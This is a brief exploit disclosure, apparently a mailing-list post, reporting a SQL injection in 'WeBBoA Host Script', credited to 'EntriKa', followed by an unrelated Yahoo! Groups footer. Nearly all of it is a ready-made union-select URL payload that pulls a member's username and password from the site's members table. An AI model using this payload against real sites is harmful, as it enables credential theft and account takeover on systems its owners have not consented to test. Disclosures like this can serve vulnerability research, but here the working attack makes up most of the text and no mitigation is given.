There is sql injection WeBBoA Host Script

Rish=High

Exploit:

http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1

Credit: EntriKa

Yahoo! Groups gets better. Check out the new email design. Plus there’s much more to
come.